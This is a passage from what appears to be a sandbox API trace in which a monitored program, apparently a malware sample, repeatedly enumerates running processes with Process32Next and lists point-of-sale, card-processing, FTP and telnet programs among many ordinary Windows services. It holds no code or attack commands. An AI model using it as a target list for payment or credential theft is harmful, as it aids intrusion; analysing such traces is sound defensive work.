lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0248.001] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0248.004] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0248.007] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0248.010] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0248.059] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0248.062] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0248.066] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0248.068] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0248.071] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0248.074] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0248.077] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0248.080] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0248.082] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0248.085] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0248.092] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0248.097] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0248.105] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.108] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.110] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0248.113] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.115] Process32Next (in: hSnapshot=0x231c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0248.119] CloseHandle (hObject=0x231c) returned 1 [0248.119] Sleep (dwMilliseconds=0x64) [0248.228] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2308 [0248.251] Process32First (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.254] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.256] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.258] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.261] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.263] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.299] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.301] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.304] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.308] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.310] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.313] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.316] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.319] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.321] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.324] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.327] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.329] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.332] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.334] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0248.335] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0248.381] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.383] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0248.384] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.386] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0248.388] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0248.389] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0248.392] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0248.394] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0248.396] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0248.398] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.399] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.401] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0248.403] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.405] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.407] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.409] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.410] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0248.413] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0248.415] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0248.456] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0248.458] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0248.460] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0248.461] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0248.463] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0248.465] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0248.467] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0248.469] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0248.470] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0248.474] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0248.476] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0248.479] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0248.481] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0248.483] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0248.485] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0248.487] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0248.489] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0248.491] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0248.534] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0248.536] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0248.539] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0248.541] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0248.543] Process32Next (in: hSnapshot=0x2308, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, 